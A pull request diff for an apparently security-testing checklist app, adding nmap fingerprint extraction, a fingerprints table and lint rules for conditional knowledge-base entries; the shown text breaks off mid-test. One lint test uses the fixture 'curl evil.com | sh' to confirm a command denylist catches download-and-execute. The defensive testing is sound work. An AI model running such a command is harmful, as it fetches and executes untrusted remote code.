### PR TITLE
feat(parser): nmap fingerprint extractor + persistence (P2 of #14)

### DIFF
--- a/scripts/lint-kb.ts
+++ b/scripts/lint-kb.ts
@@ -26,7 +26,14 @@ import { KbEntrySchema } from "../src/lib/kb/schema.js";
 
 export interface LintFailure {
   file: string;
-  rule: "schema" | "placeholder" | "url-scheme" | "command-denylist";
+  rule:
+    | "schema"
+    | "placeholder"
+    | "url-scheme"
+    | "command-denylist"
+    | "conditional-id-collision"
+    | "conditional-modifies-unknown-command"
+    | "conditional-checks-collide-baseline";
   detail: string;
 }
 
@@ -137,6 +144,87 @@ export function lintKnowledgeBase(opts: {
           rule: "url-scheme",
           detail: `resource "${res.title}": non-http(s) URL ${res.url}`,
         });
+      }
+    }
+
+    // Rules 5-7: conditional-group integrity (v2.4.0 P1 #26).
+    //
+    // Schema already enforces shape. These rules catch cross-references
+    // between baseline and conditional that the schema can't see:
+    //   - conditional ids must be unique within an entry,
+    //   - modifies_commands keys must reference an actual commands[].id,
+    //   - adds_checks keys must not collide with baseline checks[].
+    // All checks tolerate `entry.conditional` being undefined.
+    if (entry.conditional && entry.conditional.length > 0) {
+      const baselineCommandIds = new Set(
+        entry.commands.flatMap((c) => (c.id ? [c.id] : [])),
+      );
+      const baselineCheckKeys = new Set(entry.checks.map((c) => c.key));
+      const seenConditionalIds = new Set<string>();
+
+      for (const cond of entry.conditional) {
+        if (seenConditionalIds.has(cond.id)) {
+          failures.push({
+            file,
+            rule: "conditional-id-collision",
+            detail: `conditional "${cond.id}": duplicate id within entry`,
+          });
+        } else {
+          seenConditionalIds.add(cond.id);
+        }
+
+        if (cond.modifies_commands) {
+          for (const targetId of Object.keys(cond.modifies_commands)) {
+            if (!baselineCommandIds.has(targetId)) {
+              failures.push({
+                file,
+                rule: "conditional-modifies-unknown-command",
+                detail: `conditional "${cond.id}": modifies_commands references unknown id "${targetId}" — add an \`id: ${targetId}\` to the matching command in commands[]`,
+              });
+            }
+          }
+        }
+
+        for (const c of cond.adds_checks) {
+          if (baselineCheckKeys.has(c.key)) {
+            failures.push({
+              file,
+              rule: "conditional-checks-collide-baseline",
+              detail: `conditional "${cond.id}": adds_checks key "${c.key}" collides with baseline checks[]`,
+            });
+          }
+        }
+
+        // Also lint command templates inside conditional modifies for the
+        // same placeholder + denylist rules baseline commands respect.
+        if (cond.modifies_commands) {
+          for (const [targetId, mod] of Object.entries(cond.modifies_commands)) {
+            const candidates = [mod.append, mod.replace].filter(
+              (s): s is string => typeof s === "string",
+            );
+            for (const tmpl of candidates) {
+              const tokens = tmpl.match(/\{[A-Z_]+\}/g) ?? [];
+              for (const t of tokens) {
+                if (!PLACEHOLDER_ALLOWLIST.test(t)) {
+                  failures.push({
+                    file,
+                    rule: "placeholder",
+                    detail: `conditional "${cond.id}" modifies_commands.${targetId}: unlisted placeholder ${t}`,
+                  });
+                }
+              }
+              for (const rule of COMMAND_DENYLIST) {
+                if (rule.pattern.test(tmpl)) {
+                  failures.push({
+                    file,
+                    rule: "command-denylist",
+                    detail: `conditional "${cond.id}" modifies_commands.${targetId}: hit ${rule.name} (${tmpl})`,
+                  });
+                }
+              }
+            }
+          }
+        }
       }
     }
   }

--- a/src/lib/db/__tests__/client-boot.test.ts
+++ b/src/lib/db/__tests__/client-boot.test.ts
@@ -56,7 +56,7 @@ describe("DB boot sequence (Plan 02)", () => {
     void db; // no explicit re-run needed; test above covers idempotency
   });
 
-  it("PERSIST-01: all 14 base tables exist after migration", () => {
+  it("PERSIST-01: all 15 base tables exist after migration", () => {
     // Updated in Phase 5 Plan 01: port_commands added for AutoRecon manual commands.
     // Updated in v2 Plan: search_index FTS5 virtual table added (migration 0002).
     // Updated in v2 P0-B: port_evidence added for screenshots/attachments (migration 0003).
@@ -83,6 +83,7 @@ describe("DB boot sequence (Plan 02)", () => {
       "hosts",
       "port_commands",
       "port_evidence",
+      "port_fingerprints",
       "port_notes",
       "port_scripts",
       "ports",

--- a/src/lib/db/__tests__/fingerprints-repo.test.ts
+++ b/src/lib/db/__tests__/fingerprints-repo.test.ts
@@ -1,0 +1,130 @@
+import { describe, expect, it, beforeEach } from "vitest";
+import { createTestDb } from "../../../../tests/helpers/db.js";
+import { engagements, hosts, ports } from "../schema.js";
+import {
+  replaceForPort,
+  listForPort,
+} from "../fingerprints-repo.js";
+
+describe("fingerprints-repo (v2.4.0 P2 #27)", () => {
+  let db: ReturnType<typeof createTestDb>;
+  let portId: number;
+
+  beforeEach(() => {
+    db = createTestDb();
+    const now = new Date().toISOString();
+    const eng = db
+      .insert(engagements)
+      .values({
+        name: "test-engagement",
+        scanned_at: null,
+        raw_input: "x",
+        source: "nmap-text",
+        created_at: now,
+        updated_at: now,
+      })
+      .returning({ id: engagements.id })
+      .get();
+    const host = db
+      .insert(hosts)
+      .values({
+        engagement_id: eng.id,
+        ip: "10.0.0.1",
+        is_primary: true,
+      })
+      .returning({ id: hosts.id })
+      .get();
+    const port = db
+      .insert(ports)
+      .values({
+        engagement_id: eng.id,
+        host_id: host.id,
+        port: 80,
+        protocol: "tcp",
+        state: "open",
+      })
+      .returning({ id: ports.id })
+      .get();
+    portId = port.id;
+  });
+
+  it("inserts fingerprints inside a transaction", () => {
+    db.transaction((tx) =>
+      replaceForPort(tx, portId, "nmap", [
+        { type: "tech", value: "apache" },
+        { type: "cves", value: "CVE-2021-41773" },
+      ]),
+    );
+    const rows = listForPort(db, portId);
+    expect(rows.map((r) => `${r.type}:${r.value}`).sort()).toEqual([
+      "cves:CVE-2021-41773",
+      "tech:apache",
+    ]);
+  });
+
+  it("replaces only the given source on re-call (AutoRecon survives)", () => {
+    db.transaction((tx) => {
+      replaceForPort(tx, portId, "nmap", [{ type: "tech", value: "apache" }]);
+      replaceForPort(tx, portId, "autorecon", [
+        { type: "tech", value: "wordpress" },
+      ]);
+    });
+    db.transaction((tx) =>
+      replaceForPort(tx, portId, "nmap", [{ type: "tech", value: "nginx" }]),
+    );
+    const rows = listForPort(db, portId);
+    const sorted = rows
+      .map((r) => `${r.source}:${r.type}:${r.value}`)
+      .sort();
+    expect(sorted).toEqual([
+      "autorecon:tech:wordpress",
+      "nmap:tech:nginx",
+    ]);
+  });
+
+  it("idempotent — same set on re-call leaves identical rows", () => {
+    const set = [
+      { type: "tech" as const, value: "apache" },
+      { type: "banners" as const, value: "Apache httpd 2.4.49" },
+    ];
+    db.transaction((tx) => replaceForPort(tx, portId, "nmap", set));
+    const before = listForPort(db, portId).map(
+      (r) => `${r.type}:${r.value}`,
+    ).sort();
+    db.transaction((tx) => replaceForPort(tx, portId, "nmap", set));
+    const after = listForPort(db, portId).map(
+      (r) => `${r.type}:${r.value}`,
+    ).sort();
+    expect(after).toEqual(before);
+    expect(listForPort(db, portId).length).toBe(2);
+  });
+
+  it("empty array clears the source's rows", () => {
+    db.transaction((tx) =>
+      replaceForPort(tx, portId, "nmap", [
+        { type: "tech", value: "apache" },
+      ]),
+    );
+    expect(listForPort(db, portId).length).toBe(1);
+    db.transaction((tx) => replaceForPort(tx, portId, "nmap", []));
+    expect(listForPort(db, portId).length).toBe(0);
+  });
+
+  it("listForPort filters by source when supplied", () => {
+    db.transaction((tx) => {
+      replaceForPort(tx, portId, "nmap", [
+        { type: "tech", value: "apache" },
+      ]);
+      replaceForPort(tx, portId, "autorecon", [
+        { type: "tech", value: "wordpress" },
+      ]);
+    });
+    expect(listForPort(db, portId, "nmap").map((r) => r.value)).toEqual([
+      "apache",
+    ]);
+    expect(listForPort(db, portId, "autorecon").map((r) => r.value)).toEqual([
+      "wordpress",
+    ]);
+    expect(listForPort(db, portId).length).toBe(2);
+  });
+});

--- a/src/lib/db/engagement-repo.ts
+++ b/src/lib/db/engagement-repo.ts
@@ -33,6 +33,8 @@ import {
 import type { ParsedScan } from "../parser/types";
 import type { FullEngagement, EngagementSummary, PortWithDetails } from "./types";
 import type * as schema from "./schema";
+import { extractNmapFingerprints } from "../parser/fingerprints";
+import { replaceForPort as replaceFingerprintsForPort } from "./fingerprints-repo";
 
 /** Drizzle database instance type — inferred from schema for full type safety. */
 export type Db = BetterSQLite3Database<typeof schema>;
@@ -217,6 +219,13 @@ export function createFromScan(
             })
             .run();
         }
+
+        // v2.4.0 P2 (#27): persist nmap-derived fingerprints (tech / cves /
+        // banners) so the resolver (P4) can match `autorecon_finding`-style
+        // predicates without re-walking the parse tree on every render.
+        // Same transaction as the port insert — partial state on bail.
+        const nmapFps = extractNmapFingerprints(p);
+        replaceFingerprintsForPort(tx, port.id, "nmap", nmapFps);
 
         // Phase 5 D-12: AutoRecon per-port service files. Only applied to
         // the primary host — AR import is single-host today.

--- a/src/lib/db/fingerprints-repo.ts
+++ b/src/lib/db/fingerprints-repo.ts
@@ -1,0 +1,87 @@
+import "server-only";
+
+/**
+ * port_fingerprints repo (v2.4.0 P2 #27).
+ *
+ * Two operations the import path needs:
+ *   - replaceForPort: delete + reinsert a source's rows for a single port,
+ *     atomically inside the caller's transaction. Used on rescan so a
+ *     fresh nmap import doesn't accumulate stale signals from the prior
+ *     scan, while AutoRecon-derived rows (different `source`) survive.
+ *   - listForPort: read fingerprints for resolver / debugging.
+ *
+ * Inserts hit the UNIQUE(port_id, source, type, value) index so a no-op
+ * rescan with identical signals collapses into the same row set.
+ */
+
+import { and, eq } from "drizzle-orm";
+import type { BetterSQLite3Database } from "drizzle-orm/better-sqlite3";
+import { port_fingerprints, type PortFingerprint } from "./schema";
+import type * as schema from "./schema";
+
+export type Db = BetterSQLite3Database<typeof schema>;
+type Tx = Parameters<Parameters<Db["transaction"]>[0]>[0];
+
+export type FingerprintSource = "nmap" | "autorecon";
+export type FingerprintType = "tech" | "cves" | "banners";
+
+export interface FingerprintInput {
+  type: FingerprintType;
+  value: string;
+}
+
+/**
+ * Replace all rows for a (port_id, source) pair with the supplied set.
+ * No-op when `fingerprints` is empty AND there were no existing rows —
+ * the delete still runs to keep the contract simple ("after this call,
+ * rows for this scope are exactly `fingerprints`").
+ *
+ * Must run inside a transaction — the import flow uses one big tx and
+ * we don't want partial state if the caller bails halfway.
+ */
+export function replaceForPort(
+  tx: Tx,
+  portId: number,
+  source: FingerprintSource,
+  fingerprints: ReadonlyArray<FingerprintInput>,
+): void {
+  tx.delete(port_fingerprints)
+    .where(
+      and(
+        eq(port_fingerprints.port_id, portId),
+        eq(port_fingerprints.source, source),
+      ),
+    )
+    .run();
+
+  for (const fp of fingerprints) {
+    tx.insert(port_fingerprints)
+      .values({
+        port_id: portId,
+        source,
+        type: fp.type,
+        value: fp.value,
+      })
+      .onConflictDoNothing()
+      .run();
+  }
+}
+
+/** Read fingerprints for a port, optionally filtered by source. */
+export function listForPort(
+  db: Db | Tx,
+  portId: number,
+  source?: FingerprintSource,
+): PortFingerprint[] {
+  const where = source
+    ? and(
+        eq(port_fingerprints.port_id, portId),
+        eq(port_fingerprints.source, source),
+      )
+    : eq(port_fingerprints.port_id, portId);
+  return db
+    .select()
+    .from(port_fingerprints)
+    .where(where)
+    .all();
+}

--- a/src/lib/db/index.ts
+++ b/src/lib/db/index.ts
@@ -28,6 +28,8 @@ export {
   hosts,
   scan_history,
   app_state,
+  port_fingerprints,
+  type PortFingerprint,
   type AppState,
   type Engagement,
   type Port,
@@ -131,3 +133,10 @@ export {
   rescanEngagement,
   type RescanResult,
 } from "./scan-history-repo";
+export {
+  replaceForPort as replaceFingerprintsForPort,
+  listForPort as listFingerprintsForPort,
+  type FingerprintInput,
+  type FingerprintSource,
+  type FingerprintType,
+} from "./fingerprints-repo";

--- a/src/lib/db/migrations/0021_add-port-fingerprints.sql
+++ b/src/lib/db/migrations/0021_add-port-fingerprints.sql
@@ -1,0 +1,28 @@
+-- v2.4.0 P2 (#27): per-port fingerprint store for context-aware checklists (#14).
+--
+-- Each row is one signal extracted from a scan input — `tech` (e.g. php,
+-- wordpress, apache), `cves` (CVE-YYYY-NNNNN matched in product/script
+-- output), or `banners` (product + version + extrainfo joined). The
+-- resolver (P4) reads these to decide which conditional KB groups
+-- activate for a port.
+--
+-- `source` distinguishes nmap-derived rows from AutoRecon-derived ones
+-- (P3) so re-imports can refresh one set without touching the other —
+-- a fresh nmap rescan shouldn't blow away AutoRecon-derived tech tags
+-- and vice versa.
+--
+-- UNIQUE (port_id, source, type, value) makes per-port replace operations
+-- idempotent: re-extraction inserts the same rows on a no-op rescan and
+-- the constraint quietly absorbs the duplicates. Inserts in the
+-- repo layer use ON CONFLICT DO NOTHING for the same reason.
+
+CREATE TABLE port_fingerprints (
+  id INTEGER PRIMARY KEY AUTOINCREMENT,
+  port_id INTEGER NOT NULL REFERENCES ports(id) ON DELETE CASCADE,
+  source TEXT NOT NULL CHECK (source IN ('nmap', 'autorecon')),
+  type TEXT NOT NULL CHECK (type IN ('tech', 'cves', 'banners')),
+  value TEXT NOT NULL,
+  UNIQUE (port_id, source, type, value)
+);
+--> statement-breakpoint
+CREATE INDEX port_fingerprints_port_id_idx ON port_fingerprints (port_id);

--- a/src/lib/db/migrations/meta/_journal.json
+++ b/src/lib/db/migrations/meta/_journal.json
@@ -148,6 +148,13 @@
       "when": 1779000000000,
       "tag": "0020_add-theme",
       "breakpoints": true
+    },
+    {
+      "idx": 21,
+      "version": "6",
+      "when": 1779100000000,
+      "tag": "0021_add-port-fingerprints",
+      "breakpoints": true
     }
   ]
 }

--- a/src/lib/db/scan-history-repo.ts
+++ b/src/lib/db/scan-history-repo.ts
@@ -32,6 +32,8 @@ import {
   type ScanHistory,
 } from "./schema";
 import type { ParsedScan } from "../parser/types";
+import { extractNmapFingerprints } from "../parser/fingerprints";
+import { replaceForPort as replaceFingerprintsForPort } from "./fingerprints-repo";
 import type * as schema from "./schema";
 
 export type Db = BetterSQLite3Database<typeof schema>;
@@ -212,6 +214,15 @@ export function rescanEngagement(
               .run();
           }
 
+          // v2.4.0 P2 (#27): refresh nmap fingerprints on the existing
+          // port row. AutoRecon-derived rows (different `source`) survive.
+          replaceFingerprintsForPort(
+            tx,
+            existing.id,
+            "nmap",
+            extractNmapFingerprints(p),
+          );
+
           if (wasClosed) reopened += 1;
           else reaffirmed += 1;
         } else {
@@ -247,6 +258,13 @@ export function rescanEngagement(
               })
               .run();
           }
+          // v2.4.0 P2 (#27): brand-new port → seed its nmap fingerprints.
+          replaceFingerprintsForPort(
+            tx,
+            insertedPort.id,
+            "nmap",
+            extractNmapFingerprints(p),
+          );
           added += 1;
         }
       }

--- a/src/lib/db/schema.ts
+++ b/src/lib/db/schema.ts
@@ -244,6 +244,38 @@ export const ports = sqliteTable(
 );
 
 // ---------------------------------------------------------------------------
+// port_fingerprints (v2.4.0 P2 #27 — context-aware checklists, parent #14)
+// ---------------------------------------------------------------------------
+
+/**
+ * Per-port fingerprint signals derived from scan inputs.
+ *
+ * One row per (port, source, type, value). The resolver (P4) reads these
+ * to evaluate `autorecon_finding(type, value)` predicates from KB
+ * conditional groups; nmap-side predicates (script_contains,
+ * version_matches) read raw `port_scripts` and `ports` columns directly.
+ *
+ * `source` distinguishes nmap-derived rows from AutoRecon-derived ones
+ * so a re-import on one side doesn't blow away the other. UNIQUE(...)
+ * makes the per-port replace path idempotent.
+ */
+export const port_fingerprints = sqliteTable(
+  "port_fingerprints",
+  {
+    id: integer("id").primaryKey({ autoIncrement: true }),
+    port_id: integer("port_id")
+      .notNull()
+      .references(() => ports.id, { onDelete: "cascade" }),
+    source: text("source", { enum: ["nmap", "autorecon"] }).notNull(),
+    type: text("type", { enum: ["tech", "cves", "banners"] }).notNull(),
+    value: text("value").notNull(),
+  },
+  (t) => [index("port_fingerprints_port_id_idx").on(t.port_id)],
+);
+
+export type PortFingerprint = typeof port_fingerprints.$inferSelect;
+
+// ---------------------------------------------------------------------------
 // scan_history (v2 P1-G: track every nmap re-import per engagement)
 // ---------------------------------------------------------------------------
 

--- a/src/lib/kb/__tests__/lint.test.ts
+++ b/src/lib/kb/__tests__/lint.test.ts
@@ -306,4 +306,223 @@ describe("scripts/lint-kb.ts (Plan 06)", () => {
       ).toBe(true);
     });
   });
+
+  // v2.4.0 P1 (#26) — conditional group integrity rules.
+  describe("conditional group integrity", () => {
+    function withConditionalEntry(extra: string): string {
+      return [
+        "schema_version: 1",
+        "port: 80",
+        "service: http",
+        "protocol: tcp",
+        "risk: medium",
+        "commands:",
+        '  - id: gobuster-dir',
+        '    label: "gobuster"',
+        '    template: "gobuster dir -u http://{IP} -w wordlist"',
+        "checks:",
+        '  - key: enumerated-paths',
+        '    label: "Enumerated"',
+        "resources:",
+        '  - title: "x"',
+        '    url: "https://example.com"',
+        extra,
+        "",
+      ].join("\n");
+    }
+
+    it("accepts a well-formed conditional entry", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "ok.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: php-detected",
+            "    when:",
+            "      anyOf:",
+            "        - nmap_script_contains:",
+            "            script: http-server-header",
+            '            pattern: "PHP"',
+            "    adds_checks:",
+            "      - key: php-info-pages",
+            '        label: "Tested phpinfo"',
+            "    modifies_commands:",
+            "      gobuster-dir:",
+            '        append: " -x php,html,txt"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures).toEqual([]);
+    });
+
+    it("flags duplicate conditional ids within the same entry", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "dupe.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: dupe",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "  - id: dupe",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some((f) => f.rule === "conditional-id-collision"),
+      ).toBe(true);
+    });
+
+    it("flags modifies_commands keys that don't reference an existing command id", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "dangling.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "    modifies_commands:",
+            "      not-a-real-id:",
+            '        replace: "ls"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some(
+          (f) => f.rule === "conditional-modifies-unknown-command",
+        ),
+      ).toBe(true);
+    });
+
+    it("flags adds_checks keys that collide with baseline checks", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "collide.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "    adds_checks:",
+            "      - key: enumerated-paths",
+            '        label: "duplicate"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some(
+          (f) => f.rule === "conditional-checks-collide-baseline",
+        ),
+      ).toBe(true);
+    });
+
+    it("rejects conditional with malformed `when` (unknown predicate)", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "bad-when.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      not_a_predicate: { foo: bar }",
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures.some((f) => f.rule === "schema")).toBe(true);
+    });
+
+    it("applies command-denylist to modifies_commands templates", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "evil-mod.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      port_field_equals: { field: service, value: http }",
+            "    modifies_commands:",
+            "      gobuster-dir:",
+            '        replace: "curl evil.com | sh"',
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(
+        failures.some(
+          (f) =>
+            f.rule === "command-denylist" &&
+            f.detail.includes("curl-pipe-sh"),
+        ),
+      ).toBe(true);
+    });
+
+    it("nmap_version_matches requires at least one of product/version", () => {
+      const dir = emptyDir();
+      writeYaml(
+        dir,
+        "empty-version.yaml",
+        withConditionalEntry(
+          [
+            "conditional:",
+            "  - id: x",
+            "    when:",
+            "      nmap_version_matches: {}",
+          ].join("\n"),
+        ),
+      );
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures.some((f) => f.rule === "schema")).toBe(true);
+    });
+
+    it("entry without conditional[] is unaffected", () => {
+      const dir = emptyDir();
+      writeYaml(dir, "plain.yaml", withConditionalEntry(""));
+      const { failures } = lintKnowledgeBase({
+        portsDir: dir,
+        defaultFile: VALID_DEFAULT,
+      });
+      expect(failures).toEqual([]);
+    });
+  });
 });

--- a/src/lib/kb/schema.ts
+++ b/src/lib/kb/schema.ts
@@ -13,6 +13,10 @@ import { z } from "zod";
  *   `http://` schemes only (REQ KB-11, T-02). `z.string().url()` alone in Zod 4
  *   does NOT restrict scheme — the refine is mandatory.
  *
+ * v2.4.0 P1 (#26): adds optional `conditional[]` array per entry. The `when`
+ * DSL is data-only here — evaluation lands in P4. P1 just nails down the
+ * shape so KB authors can start drafting and the lint can validate.
+ *
  * See .planning/phases/01-knowledge-base-foundation/01-RESEARCH.md for rationale.
  */
 
@@ -46,6 +50,13 @@ export const CheckSchema = z
 
 export const CommandSchema = z
   .object({
+    /**
+     * Optional stable identifier referenced by `conditional[].modifies_commands`
+     * (v2.4.0 P1 #26). When omitted, the command can't be targeted by a
+     * conditional rule — purely cosmetic in baseline rendering. Required
+     * if any conditional in the same entry references it.
+     */
+    id: z.string().min(1).optional(),
     label: z.string().min(1),
     template: z.string().min(1),
   })
@@ -67,6 +78,130 @@ export const KnownVulnSchema = z
   })
   .strict();
 
+/**
+ * Conditional `when` DSL (v2.4.0 P1 #26).
+ *
+ * Discriminated union of predicates the resolver (P4) will evaluate against
+ * fingerprints persisted by P2 (nmap) and P3 (AutoRecon). P1 only defines
+ * the shape — no evaluation here. Recursive logical combinators (`anyOf`,
+ * `allOf`, `not`) compose leaf predicates.
+ *
+ * Each leaf predicate documents which fingerprint source it consumes so
+ * authors and reviewers can reason about which scan input is required for
+ * the rule to ever fire.
+ */
+const NmapScriptContainsSchema = z
+  .object({
+    /** Predicate: NSE script id matched (e.g. `http-server-header`). */
+    nmap_script_contains: z
+      .object({
+        /** NSE script id, e.g. `http-server-header`, `http-php-version`. */
+        script: z.string().min(1),
+        /** Substring searched against the script's output (case-insensitive in P4). */
+        pattern: z.string().min(1),
+      })
+      .strict(),
+  })
+  .strict();
+
+const NmapVersionMatchesSchema = z
+  .object({
+    /** Predicate: nmap version banner matched. */
+    nmap_version_matches: z
+      .object({
+        /** Optional product substring filter (e.g. `vsftpd`). */
+        product: z.string().min(1).optional(),
+        /**
+         * Optional version expression. P4 will support semver ranges
+         * (`<= 2.3.5`, `>= 1.0.0 < 2.0.0`) and exact strings.
+         */
+        version: z.string().min(1).optional(),
+      })
+      .strict()
+      .refine(
+        (v) => v.product !== undefined || v.version !== undefined,
+        {
+          message:
+            "nmap_version_matches needs at least one of product / version",
+        },
+      ),
+  })
+  .strict();
+
+const AutoreconFindingSchema = z
+  .object({
+    /** Predicate: AutoRecon importer surfaced this fingerprint. */
+    autorecon_finding: z
+      .object({
+        /** Bucket the fingerprint was stored under (`tech`, `cves`, `banners`). */
+        type: z.enum(["tech", "cves", "banners"]),
+        /** Exact value (case-insensitive in P4). */
+        value: z.string().min(1),
+      })
+      .strict(),
+  })
+  .strict();
+
+const PortFieldEqualsSchema = z
+  .object({
+    /** Predicate: a port-row field equals a value. Tight allowlist of fields. */
+    port_field_equals: z
+      .object({
+        field: z.enum(["service", "product"]),
+        value: z.string().min(1),
+      })
+      .strict(),
+  })
+  .strict();
+
+type WhenExpr =
+  | z.infer<typeof NmapScriptContainsSchema>
+  | z.infer<typeof NmapVersionMatchesSchema>
+  | z.infer<typeof AutoreconFindingSchema>
+  | z.infer<typeof PortFieldEqualsSchema>
+  | { anyOf: WhenExpr[] }
+  | { allOf: WhenExpr[] }
+  | { not: WhenExpr };
+
+export const WhenExprSchema: z.ZodType<WhenExpr> = z.lazy(() =>
+  z.union([
+    NmapScriptContainsSchema,
+    NmapVersionMatchesSchema,
+    AutoreconFindingSchema,
+    PortFieldEqualsSchema,
+    z.object({ anyOf: z.array(WhenExprSchema).min(1) }).strict(),
+    z.object({ allOf: z.array(WhenExprSchema).min(1) }).strict(),
+    z.object({ not: WhenExprSchema }).strict(),
+  ]),
+);
+
+export const CommandModificationSchema = z
+  .object({
+    /** Append the given string verbatim to the command template. */
+    append: z.string().min(1).optional(),
+    /** Swap the entire command template. Last-wins across multiple conditionals. */
+    replace: z.string().min(1).optional(),
+  })
+  .strict()
+  .refine(
+    (v) => v.append !== undefined || v.replace !== undefined,
+    { message: "command modification needs either append or replace" },
+  );
+
+export const ConditionalSchema = z
+  .object({
+    /** Stable identifier — unique within an entry's `conditional[]`. */
+    id: z.string().min(1),
+    when: WhenExprSchema,
+    /** Checks added when the predicate matches. Keys must not collide with baseline. */
+    adds_checks: z.array(CheckSchema).default([]),
+    /** Mutations keyed by command `id`. Each id must reference a real `commands[].id`. */
+    modifies_commands: z
+      .record(z.string().min(1), CommandModificationSchema)
+      .optional(),
+  })
+  .strict();
+
 export const KbEntrySchema = z
   .object({
     schema_version: z.literal(1),
@@ -81,6 +216,8 @@ export const KbEntrySchema = z
     default_creds: z.array(DefaultCredSchema).optional(),
     quick_facts: z.array(z.string()).optional(),
     known_vulns: z.array(KnownVulnSchema).optional(),
+    /** v2.4.0 P1 (#26) — fingerprint-driven conditional groups. */
+    conditional: z.array(ConditionalSchema).optional(),
   })
   .strict();
 
@@ -91,3 +228,6 @@ export type Command = z.infer<typeof CommandSchema>;
 export type DefaultCred = z.infer<typeof DefaultCredSchema>;
 export type KnownVuln = z.infer<typeof KnownVulnSchema>;
 export type Risk = z.infer<typeof RiskSchema>;
+export type Conditional = z.infer<typeof ConditionalSchema>;
+export type CommandModification = z.infer<typeof CommandModificationSchema>;
+export type { WhenExpr };

--- a/src/lib/parser/__tests__/fingerprints.test.ts
+++ b/src/lib/parser/__tests__/fingerprints.test.ts
@@ -1,0 +1,179 @@
+import { describe, expect, it } from "vitest";
+import { extractNmapFingerprints } from "../fingerprints.js";
+import type { ParsedPort } from "../types.js";
+
+function makePort(overrides: Partial<ParsedPort> = {}): ParsedPort {
+  return {
+    port: 80,
+    protocol: "tcp",
+    state: "open",
+    scripts: [],
+    ...overrides,
+  };
+}
+
+describe("extractNmapFingerprints (v2.4.0 P2 #27)", () => {
+  describe("tech tags", () => {
+    it("flags apache from product banner", () => {
+      const fps = extractNmapFingerprints(
+        makePort({ service: "http", product: "Apache httpd", version: "2.4.49" }),
+      );
+      expect(fps.some((f) => f.type === "tech" && f.value === "apache")).toBe(true);
+    });
+
+    it("flags wordpress before apache when both present (specific wins)", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          service: "http",
+          product: "Apache httpd",
+          version: "2.4.49",
+          scripts: [
+            { id: "http-generator", output: "WordPress 5.8" },
+          ],
+        }),
+      );
+      const tech = fps.filter((f) => f.type === "tech").map((f) => f.value);
+      expect(tech).toContain("wordpress");
+      expect(tech).toContain("apache");
+      expect(tech.indexOf("wordpress")).toBeLessThan(tech.indexOf("apache"));
+    });
+
+    it("flags php from X-Powered-By header in script output", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          service: "http",
+          scripts: [
+            {
+              id: "http-server-header",
+              output: "Server: Apache/2.4.49\nX-Powered-By: PHP/7.4.3",
+            },
+          ],
+        }),
+      );
+      const tech = fps.filter((f) => f.type === "tech").map((f) => f.value);
+      expect(tech).toContain("php");
+      expect(tech).toContain("apache");
+    });
+
+    it("dedupes tech tags across multiple sources", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          product: "OpenSSH",
+          version: "7.2p2",
+          extrainfo: "OpenSSH protocol 2",
+          scripts: [{ id: "ssh2-enum-algos", output: "OpenSSH banner" }],
+        }),
+      );
+      const opensshCount = fps.filter(
+        (f) => f.type === "tech" && f.value === "openssh",
+      ).length;
+      expect(opensshCount).toBe(1);
+    });
+
+    it("emits no tech tag for an unknown service", () => {
+      const fps = extractNmapFingerprints(
+        makePort({ service: "thisis-not-a-known-tag" }),
+      );
+      expect(fps.some((f) => f.type === "tech")).toBe(false);
+    });
+  });
+
+  describe("CVE extraction", () => {
+    it("pulls CVEs out of NSE script output", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          scripts: [
+            {
+              id: "vulners",
+              output:
+                "CVE-2011-2523 vsFTPd backdoor\nCVE-2015-3306 mod_copy RCE",
+            },
+          ],
+        }),
+      );
+      const cves = fps.filter((f) => f.type === "cves").map((f) => f.value);
+      expect(cves).toContain("CVE-2011-2523");
+      expect(cves).toContain("CVE-2015-3306");
+    });
+
+    it("uppercases lowercase CVE references", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          scripts: [{ id: "x", output: "cve-2021-44228 log4shell" }],
+        }),
+      );
+      const cves = fps.filter((f) => f.type === "cves").map((f) => f.value);
+      expect(cves).toContain("CVE-2021-44228");
+    });
+
+    it("dedupes the same CVE referenced multiple times", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          product: "Bad/CVE-2020-1234",
+          scripts: [
+            { id: "a", output: "see CVE-2020-1234 advisory" },
